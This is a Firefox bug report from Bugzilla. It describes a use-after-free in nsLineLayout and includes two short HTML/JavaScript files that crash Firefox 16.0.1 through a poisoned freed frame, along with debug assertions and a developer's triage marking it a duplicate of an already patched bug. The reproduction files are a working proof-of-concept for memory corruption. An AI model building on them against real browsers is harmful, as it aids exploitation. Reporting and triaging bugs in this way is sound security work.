Bug 802991
Opened 12 years ago
Closed 12 years ago
Use-after-free in nsLineLayout
Categories
(Core :: Layout, defect)
RESOLVED
DUPLICATE
of bug 765409
People
(Reporter: abbGZcvu_bugzilla.mozilla.org, Unassigned)
Details
(Keywords: crash)
Attachments
(1 file: 551 bytes, application/octet-stream)
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Steps to reproduce:
The files below trigger a use-after-free in Firefox 16.0.1, causing it to crash when it tries to access data through a poisoned frame. frame.html can trigger the issue by itself; repro.html is not required but does make it easier to trigger the access violation.
--- repro.html ---
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<iframe src="frame.html"></iframe>
</body>
</html>
--- frame.html ---
<!DOCTYPE html>
<fieldset><x dir="rtl">
<script id="y" type="text/javascript">
// Detach the currently executing script element from the tree before writing.
var oScriptElement = document.getElementById("y");
oScriptElement.parentNode.removeChild(oScriptElement);
// Unclosed inline elements, mixing the surrounding rtl direction with an ltr one,
// written while the parser is still open.
var oHtml = '<x>' +
'<x id="x"></x>' +
' ' +
'<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' +
'<x>' +
' ' +
'<x dir="ltr">';
document.write(oHtml);
// Force a synchronous layout flush so the inline/line frames get built.
document.documentElement.offsetTop;
// Mutate the inline content so the frames are reflowed again.
var oElement = document.getElementById("x");
oElement.textContent = 'x';
</script>
Actual results:
Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame
Expected results:
No crash
Updated•12 years ago
Component: Untriaged → Layout
Product: Firefox → Core
Comment 1•12 years ago
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64,
but not -aurora or trunk. Before the crash I got these assertions:
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339
which points to bug 765409. After applying the patch there, the crash
and assertions are gone. (The fix will land on -beta (Fx17) soon)
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Updated•10 years ago
Group: core-security